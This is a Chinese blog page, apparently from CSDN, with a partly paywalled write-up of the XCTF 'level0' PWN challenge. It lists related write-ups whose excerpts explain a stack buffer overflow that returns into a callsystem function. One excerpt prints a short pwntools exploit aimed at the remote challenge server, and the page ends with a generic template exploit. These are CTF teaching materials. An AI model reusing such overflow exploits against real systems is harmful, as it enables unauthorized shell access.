攻防世界PWN-level0

最新推荐文章于 2023-02-28 13:24:53 发布
原创 最新推荐文章于 2023-02-28 13:24:53 发布 · 3.4k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍了一款64位程序的安全漏洞分析过程。通过对程序进行反编译和审计,发现了一个可被利用的read函数漏洞,通过精心构造payload,成功获取了远程shell并读取flag。

题目:level0

在这里插入图片描述

老规矩先进PE

在这里插入图片描述
查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数

在这里插入图片描述
比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO)


简单运行一遍,发现是hello word

在这里插入图片描述




进64位IDA

鼠标悬停在main函数上按f5反编译

在这里插入图片描述
查看源码:

最低0.47元/天 解锁文章
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1909
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界-pwn新手区-level0
CHAWUCIREN1的博客
07-26 354
下载附件,执行一下,64位程序 checksec一下 NX执行保护开启 丢进ida里面分析一下 F5反编译 发现return到一个函数里面,点击查看一下 发现申请的栈空间是0x80,read的值却是0x200,说明存在栈溢出 然后点击callsystem这个函数, 发现shell,也就是说我们需要利用栈溢出覆盖到callsystem函数的返回地址0x400596执行shell。 查看buf的栈空间 shell_addr = 0x400596 payload = ‘A’*(0x80+8) + p.
攻防世界pwnlevel0
Sakura给爷pwn全场
09-02 390
查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数,可疑,点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h,距离栈帧顶部rbp为80h,可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。 查看callsystem函数,代码段地址为0x400596 思路 把return address用callsystem函数
攻防世界PWN题——level0
Greic的博客
12-01 3714
嘿嘿,又是我,我又肥来了。今天带来的是攻防世界第三题的writeup,这次话不多说,我们直接进入主题。 无论怎么样,pwn题前两步少不了——查看文件类型和保护类型: 64位linux操作系统,只开了NX保护,再打开IDA看看。 将Hello,World显示到屏幕上,再点开函数看看: 可以看到,buf是分配了80个字节(从rbp-80-rbp+0),但是read函数读入了0x200字节,因此,这里明显有栈溢出,再点开buff看看: 可以看到,我们只需要将buf和s覆盖,也就...
攻防世界 Pwn level0
MrTreebook的博客
07-13 218
攻防世界pwn level0 下载本地文件拉到Kali 检查文件 file level0 checksec level0 没有开任何保护 拉进IDA看一下 在这里看到了 ”bin/sh" 可以在这里获取shell权限 目标明确 看到了vulnerable_function 很明显是栈溢出的操作 看一下栈空间 buf上需要覆盖 80-0+8 大小的数据 r 上弹 callsystem的地址即可 开始写exp ##coding=utf8 from pwn import * ## 构
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1683
学习pwn开始,慢慢来不要急
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3564
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界PWN-level2
Deeeelete的博客
11-13 1277
题目:level2 开PE看信息,进checksec看详情 进checksec,查看到程序无PIE,堆栈不可执行,无栈保护 跑一遍逻辑,还是hello word 于是开32位IDA查看 f5main函数 看源码,主要就是echo了一个hello world,同时很明显上方有一个显眼的脆弱函数 双击进入脆弱函数查看 单独摘出源码 ssize_t vulnerable_function() { char buf; // [sp+0h] [bp-88h]@1 system("ec
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 3552
攻防世界的格式化字符串漏洞利用,简单题
攻防世界pwn新手练习(level0
BurYiA的博客
10-24 1054
level0 老规矩哦,我们先checksec一下,收集一下信息 64位程序,开了NX,没啥说的,还在接受范围内,运行一下试试 唔,没啥东西,继续IDA吧。(╯‵□′)╯︵┴─┴ emmm,主函数倒是挺简单的,就一行打印,一行输入 但…不知你们有米有发现有个很奇怪的函数名,我们悄悄的瞅一瞅 果然不对劲,首先它的名字中有个system(手动加粗),这个是什么东西嘞,简单的来说,它拥有系统的最高...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.youkuaiyun.com/A951860555/article/details/112849849
攻防世界新手题(PWN——level0
0pt1mus
12-19 1223
level0 转载自:superj.site的博客 0x00 首先,进行通过file判断附件文件类型。 判断是ELF文件。这时就可以通过checksec判断文件的保护措施。 得到只开启了执行保护,地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。 在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。 发现该题中用到了w...
[攻防世界 pwn]——level0
Y_peak的博客
02-18 289
[攻防世界 pwn]——level0
攻防世界pwn新手练习区——level0
smsyz2019的博客
10-31 1779
这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件,将程序放进虚拟机中 拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序,只开启了NX保护。NX保护简单来说就是代码不可执行。 例如你向栈上输入一段shellcode,那么NX保护就是防止这个shellcode的执行。 具体内容和其他的程序保护可以参考这个博客。l...
攻防世界-level0
qq_45771413的博客
04-22 707
探路 只有NX 试运行: 平平无奇 IDA 找到了读取越界的地方: buf长度80,但是读取了512 解题不相关但是想记一下怕又忘了:寻找buf的地址, ALT+T 查找字符串,选中最后的显示所有 学长support: 栈是存储局部变量的 使用完需要恢复成上一个函数的栈 结构如下: 数据 栈底地址(谁的?不吞掉后果如何) rip:返回的地址 写脚本的目的:把buf占满,吞掉rbp,修改rip的地址,跳转到指定地址 做到这其实卡壳了,其实还有shift+f12这个老朋友○| ̄|_ 敏感权
攻防世界level0
qq_45213259的博客
07-24 1527
from pwn import * p = remote("111.198.29.45","32092") call_system = 0x400596 print p64(call_system) payload = 0x88*'a' + p64(call_system) p.sendline(payload) p.interactive()
攻防世界 level0
qq_62539372的博客
03-21 730
常规操作: 可以看到no canary found 没有栈保护机制 可以利用栈溢出pwn掉程序(NX,Canary,Relro,PIE保护机制的讲解文末聊) 64位放进ida64分析: 主函数的内容 :write()函数(write函数和read函数文末聊) 返回值是vulnerable_founction函数里的内容 点开看一下 返回值是read()函数的内容 有个栈 看一下 .........
攻防世界 level0
@一个努力学编程的网安小可爱的博客
01-20 2307
攻防世界 level0 pwn区 工具说明 pwngdb IDA pro python3 1 checksec pwbgdb 自带checksec功能,用法 gdb ./www checksec
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1938
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
攻防世界level0_pwn
最新发布
03-08
### CTF Challenge Level 0 PWN Walkthrough In the context of CTF challenges, particularly focusing on the **Attack Defense World**, solving a basic PWN challenge involves understanding fundamental concepts and techniques used in exploiting software vulnerabilities. For an introductory level like Level 0, one typically encounters simple buffer overflow exploits which serve as excellent starting points for learning more complex attacks. #### Understanding Buffer Overflow Vulnerabilities Buffer overflows occur when data written to a buffer exceeds its allocated space, potentially corrupting adjacent memory locations[^2]. In simpler terms, this means that if input is not properly validated before being copied into fixed-size buffers within programs, attackers can manipulate inputs to overwrite critical parts of program state such as function return addresses or pointers leading to arbitrary code execution. For Level 0 PWN tasks: - Programs often contain vulnerable functions susceptible to stack-based buffer overflows. - The goal usually revolves around crafting malicious payloads designed specifically to alter control flow mechanisms (like EIP/RIP registers). To solve these types of problems effectively requires familiarity with assembly language basics along with debugging tools like GDB (GNU Debugger). #### Exploitation Process Overview Given the nature of beginner-level exercises found at platforms similar to those described by references provided earlier[^3], here’s how one might approach tackling them programmatically using Python alongside pwntools library—a powerful framework tailored towards rapid prototyping during competitions. ```python from pwn import * # Establish connection to remote service conn = remote('target_host', target_port) # Prepare payload based on discovered offset value from previous analysis steps payload = b'A' * OFFSET_VALUE + pack('<I', RETURN_ADDRESS) # Send crafted string followed by newline character(s) conn.sendline(payload) # Interact with process interactively after sending exploit; useful for shell sessions etc. conn.interactive() ``` This script demonstrates establishing communication channels between local machines running scripts against remotely hosted services while preparing carefully constructed strings intended to trigger desired behaviors upon delivery—typically gaining unauthorized access through command shells opened post-exploit success.
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值